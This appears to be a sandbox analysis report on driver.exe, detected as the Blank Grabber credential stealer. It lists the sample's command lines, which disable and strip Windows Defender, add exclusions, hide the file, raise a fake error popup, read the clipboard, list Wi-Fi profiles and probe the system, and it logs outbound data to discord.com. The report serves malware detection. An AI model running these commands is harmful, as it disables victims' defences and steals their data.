2025-01-10 10:00:41 UTC	16384	OUT	Data Raw: 0b 79 5b 48 c1 6a 07 20 4b 67 b6 a8 31 82 88 32 20 69 a7 dc f1 ae 67 8b f7 53 4f 6e f6 73 dd cd 5b bc f5 ca 24 0c f0 a0 f1 5e 8f a4 e8 d1 2b c7 e9 d3 5b 8b ab 6b 43 2c 5d 65 1e ee 1d a8 d7 14 2c fd 2a da 6c 69 dd a0 5e 51 36 29 53 bc df b3 b5 70 52 f3 ef 43 a3 19 7a d4 d0 4f 08 3d b5 b1 dd 2c 52 ab 84 b4 95 c6 f6 a0 5d 2f 06 c6 a5 90 3b a2 f0 5e a1 d1 c0 8d 81 9f aa e6 fa be 9d cd f5 42 fa 1c 08 62 9d b9 50 0a 02 d9 f3 84 b4 74 ef 2a 7b 50 92 41 f8 35 25 7b 69 60 32 54 cb 94 44 e8 0c 9a d2 6b 69 15 10 9a dd 8d 0e 70 f1 75 58 30 fd e1 54 7b 96 2b 26 e7 58 a9 f6 af 1a 09 d3 d8 7d c3 a3 a6 77 80 4d 28 c1 b9 40 52 fc 7f 8f 80 87 20 f2 dc c2 90 a3 ee 91 de a1 7b 6d ca a7 3e d4 39 69 d1 48 51 16 b0 59 af e3 e6 0f 16 1e 71 47 53 6a 1a 48 9d 01 86 2a fc c3 6a 89 Data Ascii: y[Hj Kg12 igSOns[$^+[kC,]e,li^Q6)SpRCzO=,R]/;^BbPt{PA5%{i`2TDkipuX0T{+&X}wM(@R {m>9iHQYqGSjH*j
2025-01-10 10:00:41 UTC	16384	OUT	Data Raw: ed 35 22 df 0a 28 e7 9f 4f e0 2b 4a 5e f3 d0 5d ba c1 89 1c 71 01 1b 17 21 01 40 82 f0 41 17 87 d5 4e 2b bd 5f e3 04 c8 9f 6d 8b db d6 52 7c 17 ca d2 67 81 28 d7 af bb be cf 6a d9 c7 c4 25 33 fc f1 86 36 5d 49 29 4c 7f 75 c4 a8 a1 a9 9f ef 3c 0f 9d af ad a7 a4 d1 62 40 24 d9 be 3a a6 e8 97 a8 9b 72 d1 72 66 4d f5 22 68 cd a9 4a b5 ba 98 08 9a 6b 6f 31 ec 06 49 17 ca 40 43 c2 33 a2 99 83 aa e2 91 bb 25 e1 6e df c3 8c 1f ef af cc 4b 28 58 51 5a 6f ba fc b8 eb 74 bf 2b d8 3e 30 8e d8 9c ba d7 cf 9e 13 1b 06 c4 de db 38 8c 98 96 a7 e2 54 08 02 92 71 11 69 49 f6 d7 be 51 95 78 c0 13 54 b6 35 86 44 11 e4 65 aa 26 38 30 da a9 a2 a0 04 2f b1 f6 f6 03 63 b1 f5 a9 a6 9b ca 8d c9 88 4b 5c fd 2a 68 b4 cf 51 d8 f4 2b 96 18 75 7b f6 99 d4 4a de 8c 69 d5 e2 19 cf e5 47 Data Ascii: 5"(O+J^]q!@AN+_mR\|g(j%36]I)Lu<b@$:rrfM"hJko1I@C3%nK(XQZot+>08TqiIQxT5De&80/cK\*hQ+u{JiG
2025-01-10 10:00:41 UTC	16384	OUT	Data Raw: ca 92 5e 01 29 4e ad e3 c9 b9 fd a6 62 0a 65 e0 f2 f2 b5 6f 25 5c 42 f3 a6 bd e4 78 af 42 6d 52 e2 a0 07 87 6a 7b 78 64 ec 38 14 7d 72 d2 89 67 ae 1e b6 b9 3f ac 2b 39 f7 e2 e3 0c 5f 3a a9 cf ce 50 b8 0a b1 bd fa 4c d5 2d 27 e6 20 33 26 b4 b2 98 00 7a b6 ef 5b 66 99 b0 85 1f 3a 53 95 cf b7 1f 5a c3 ff cb 09 9f 60 f6 a8 9a 59 11 b9 c9 38 d8 02 d4 e3 34 09 10 3b 38 e0 fd e6 68 d5 e9 d4 34 bf d9 8a ee 4d db df 6d fd 3f 12 c6 7b ae 7e 30 88 3d 5e 41 f4 68 cf 4c 25 48 36 36 b2 ee de e4 98 53 17 49 65 de 19 cd 39 24 0c 0d c3 08 75 cb e3 7d 15 be 9a fd 60 05 16 06 0f aa cf 06 12 18 6b 44 c5 c1 c9 21 cb 9e 53 74 b0 39 e7 57 2e fa 1b cf 5b 8d 9c 82 d7 40 0f 8c 08 f8 65 2c c3 85 f3 9f fc c7 06 54 05 8e b0 79 a2 36 68 c6 69 26 23 46 86 1d 87 18 23 3f 2c a1 88 93 1f Data Ascii: ^)Nbeo%\BxBmRj{xd8}rg?+9_:PL-' 3&z[f:SZ`Y84;8h4Mm?{~0=^AhL%H66SIe9$u}`kD!St9W.[@e,Ty6hi&#F#?,
2025-01-10 10:00:41 UTC	16384	OUT	Data Raw: 7a c4 5c 31 e5 b0 dc 23 15 41 db b0 2b 54 2a 4a c6 79 4e 42 b4 a9 ee 14 51 f9 da 3c ef 2f 0e 54 b6 35 2d 27 ae 1f 47 34 a1 35 24 38 bd f9 8b 5a 82 ca 07 2b b1 33 e0 c7 9f 2c c9 65 7c bf 69 cf 63 88 70 09 ad 73 e9 eb c7 f8 93 f0 0d b3 ff bb 38 9e 28 54 9d ae e3 a1 0c 1b 26 c7 a5 af 18 0e 04 69 b2 35 7d 17 f1 66 50 32 f3 66 27 4b 6a 0a 94 2e 3a 9f cf 20 3b be 4d f6 45 d0 3d 37 43 eb 91 9f 74 40 4a 2c 39 c3 fc cc 8d 42 12 5f a1 ef 1d 5e 69 11 1e 2a 99 71 90 86 e8 20 64 1f b4 9c df 25 78 40 f0 77 6d a5 38 e4 1c ef 3f 76 d5 6e 93 2d 83 59 c8 f0 fa 34 17 20 37 e1 90 0f 14 a9 fe 1b 2c 96 3a ee 5d f9 1c 0b f6 9b 11 68 d0 67 b9 ce 9c 05 09 08 5a 2d 86 47 c4 f2 cc 55 7e 38 18 dd 05 71 56 ae 59 b3 90 56 0e 49 d1 98 5a 29 a6 32 fa dd b0 19 b4 f0 96 4f 50 68 0e bc f4 Data Ascii: z\1#A+TJyNBQ</T5-'G45$8Z+3,e\|icps8(T&i5}fP2f'Kj.: ;ME=7Ct@J,9B_^iq d%x@wm8?vn-Y4 7,:]hgZ-GU~8qVYVIZ)2OPh
2025-01-10 10:00:42 UTC	1259	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 10:00:41 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1736503243 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NV9omaOnoMiwOGvkRDgo7SiGweJrmgfyLVRfBNckAnW2%2Bz92ZiQGy9Gam2yFFlgXYRpsX1ImMt%2BsUGDqL9wo75RjJQw%2BBT%2BHnhGewl%2F80WkPXiscRONUgxymqGbz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=498f3b3fed20652a61917c341884d7aa84696853-1736503241; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=VbHab4IqB6lQjgKMolM4ulgWWvtlWgKW2e_NqXUOIoc-1736503241973-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8ffbd24abd5d43af-EWR

Target ID:	0
Start time:	05:00:02
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\driver.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\driver.exe"
Imagebase:	0x7ff6a29b0000
File size:	8'761'213 bytes
MD5 hash:	D368F3959B9A9FF30D34004D99676729
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2060159493.000001C6D7275000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2060159493.000001C6D7273000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:00:04
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\driver.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\driver.exe"
Imagebase:	0x7ff6a29b0000
File size:	8'761'213 bytes
MD5 hash:	D368F3959B9A9FF30D34004D99676729
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2435665528.000001C0EE2E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2434059105.000001C0EEF45000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2440748716.000001C0EE2E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()""
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\driver.exe""
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()"
Imagebase:	0x7ff7b9f60000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h +s "C:\Users\user\Desktop\driver.exe"
Imagebase:	0x7ff64e8e0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	05:00:06
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:00:07
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:00:07
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7268, Parent PID: 7236

General

Target ID:	20
Start time:	05:00:07
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:00:07
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:00:08
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	05:00:08
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:00:08
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	05:00:08
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:00:08
Start date:	10/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6d1120000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	05:00:08
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	05:00:08
Start date:	10/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6d1120000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	05:00:08
Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff698260000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	05:00:08
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7616, Parent PID: 6620

General

Target ID:	31
Start time:	05:00:08
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	05:00:08
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	05:00:08
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	05:00:09
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	05:00:09
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	05:00:09
Start date:	10/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6bec80000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	05:00:09
Start date:	10/01/2025
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff6c9530000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	05:00:09
Start date:	10/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6d1120000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	05:00:11
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7980, Parent PID: 6620

General

Target ID:	40
Start time:	05:00:11
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	05:00:11
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	05:00:11
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	05:00:11
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
